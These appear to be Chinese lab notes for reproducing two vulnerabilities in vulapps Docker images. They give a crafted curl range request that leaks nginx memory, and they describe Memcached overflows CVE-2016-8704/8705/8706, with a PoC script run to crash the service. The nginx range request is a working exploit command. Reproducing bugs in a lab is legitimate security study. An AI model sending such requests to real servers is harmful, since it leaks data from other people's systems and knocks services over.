• docker pull medicean/vulapps:n_nginx_1
• docker run -d -p 9000:80 medicean/vulapps:n_nginx_1
• curl -I http://ip:port/proxy/demo.png
• 看到 Content-Length: 16585, 找个比这个数大的值,例如 17208, 第二个 range 值为 0x8000000000000000-17208, 也就是 9223372036854758600
• curl -i http://ip:port/proxy/demo.png -r -17208,-9223372036854758600
泄露出的信息
Memcached被曝存在多个整数溢出漏洞(CVE-2016-8704、CVE-2016-8705、CVE-2016-8706),可导致远程代码执行。这些漏洞存在于用于插入(inserting)、附加(appending,)、前置(appending)、修改键值对的函数中,在SASL身份验证位置也存在问题。 攻击者可以通过向服务器发送一个精心构造的Memcached命令实现该漏洞的利用。此外,这些漏洞还可以泄露敏感的进程信息,并且可以多次触发,利用这些敏感的进程信息,攻击者可以绕过像ASLR等常见的漏洞缓解机制。 漏洞披露:2016年10月10日 漏洞修补:2016年10月12 日 公开发布:2016年10月31日
• docker pull medicean/vulapps:m_memcached_CVE-2016-8704
• docker run -d -p 11211:11211medicean/vulapps:m_memcached_CVE-2016-8704
• python poc.py 被攻击机 11211
执行完之后服务崩溃